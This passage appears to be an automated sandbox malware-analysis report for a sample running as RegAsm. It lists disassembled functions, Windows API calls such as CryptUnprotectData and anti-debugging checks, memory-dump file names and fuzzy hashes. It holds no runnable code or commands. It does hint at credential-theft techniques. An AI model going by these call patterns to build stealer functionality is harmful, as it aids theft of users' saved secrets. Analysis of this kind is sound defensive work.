GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C30BA86

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: 0aa16e78d8d14876a5c4429424ba0c52806cb8dd160d82d9f0ee05865dc1801c
Instruction ID: c653522a4bd238346329ffb423ad5bafabe646b2b3ebd3f5df3181acae9cb6a7
Opcode Fuzzy Hash: 0aa16e78d8d14876a5c4429424ba0c52806cb8dd160d82d9f0ee05865dc1801c
Instruction Fuzzy Hash: 32515E72F01219DFDF14CEA8D881ADEB7B6AF88318F144129E901BBB04DB31AD458F91

Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Strings

N@, xrefs: 00409AD4, 00409AE1, 00409AF9, 00409B18, 00409AE4, 00409B1B

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N@
API String ID: 4291131564-4229412743
Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54

Function 6C2E8AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2DFA80: GetCurrentThreadId.KERNEL32 ref: 6C2DFA8D
Part of subcall function 6C2DFA80: AcquireSRWLockExclusive.KERNEL32(6C32F448), ref: 6C2DFA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C301563), ref: 6C2E8CBA
free.MOZGLUE(?), ref: 6C2E8CCF

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: 4ddfa8c185d44097d772a4806f1c284b02d8d85598eac4b0d610272ecf9b4186
Instruction ID: 3fd5dc5f7923b484b5a64d34d46eb27e1d1a947ec56e5513eafa8078e0f7215a
Opcode Fuzzy Hash: 4ddfa8c185d44097d772a4806f1c284b02d8d85598eac4b0d610272ecf9b4186
Instruction Fuzzy Hash: 1B717C71A14B058FD708CF29C480656B7F1FF99314F459A5EED899B722E770E884CB41

Function 6C2AF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,?,00000000,?,0000001C,?), ref: 6C2AF2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6C2AF2F0
NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,0000001C,0000001C,?), ref: 6C2AF308
RtlNtStatusToDosError.NTDLL ref: 6C2AF36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C2AF371

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: b77a5bf11607548e5bdea23c09a3627bafd17895c5283ff98fe9045abe8df53f
Instruction ID: f29563ea6de556368f4d9758a678621b193284611789203f19fddc4be44bb192
Opcode Fuzzy Hash: b77a5bf11607548e5bdea23c09a3627bafd17895c5283ff98fe9045abe8df53f
Instruction Fuzzy Hash: 4021B630A0038DDFEF10CAA2DD54BEF76B8EB4436EF144229F810969C0D7789949CB61

Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BBA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
TerminateProcess.KERNEL32(00000000), ref: 0041BBE5

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D

Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66

Function 6C2F77A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2F7A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2F7A93

Part of subcall function 6C2C5C50: GetTickCount64.KERNEL32 ref: 6C2C5D40
Part of subcall function 6C2C5C50: EnterCriticalSection.KERNEL32(6C32F688), ref: 6C2C5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C2F7AA1

Part of subcall function 6C2C5C50: __aulldiv.LIBCMT ref: 6C2C5DB4
Part of subcall function 6C2C5C50: LeaveCriticalSection.KERNEL32(6C32F688), ref: 6C2C5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C2F7B31

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 999644a07f3936fc4277e0ec9aa6a59c5af5b1b53ba0de13de08deb06534d15a
Instruction ID: 5d9ac0f625e0b4a991a60bf8ed180bc99b2c924ce806c63f2911ad77e62a4397
Opcode Fuzzy Hash: 999644a07f3936fc4277e0ec9aa6a59c5af5b1b53ba0de13de08deb06534d15a
Instruction Fuzzy Hash: B5B17B3564838D8BCB14CE24C45069EF7E2BBC9718F154A1CEDA567B91DB70E90BCB82

Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65

Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50

Function 6C30B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,?,0000001C,6C2DFE3F), ref: 6C30B720
RtlNtStatusToDosError.NTDLL ref: 6C30B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,00000000,?,?,00000000,?,6C2DFE3F), ref: 6C30B760

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 66a72820dfa0a61c2fbd79003c5dc947d322ab2439a8dd9036c60ded13ea6521
Instruction ID: a60a473bf2b5d2d699ada947329a38ddbfcf9b7afc874369073a9f6a52fe48d6
Opcode Fuzzy Hash: 66a72820dfa0a61c2fbd79003c5dc947d322ab2439a8dd9036c60ded13ea6521
Instruction Fuzzy Hash: D7F0F471A4420CAEDF049AA1CC81BDEB3BC9F0472EF005139D501659C0C774998CCEA1

Function 6C30B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C2B03D4,?), ref: 6C30B955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C30B9A5

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 9aea5a8d2c86b54886d2692d57bc71247011edc92f3ecc75998a25d114842801
Instruction ID: c1309150924a856bc22d37cb5a3705963a5602223e692c6b8b4970db0920576e
Opcode Fuzzy Hash: 9aea5a8d2c86b54886d2692d57bc71247011edc92f3ecc75998a25d114842801
Instruction Fuzzy Hash: 6E41A571F0121D9FDF04CFA9D891ADEB7B9EF88318F148129E905AB704DB31A8458F90

Function 0041CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A

Function 00419750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
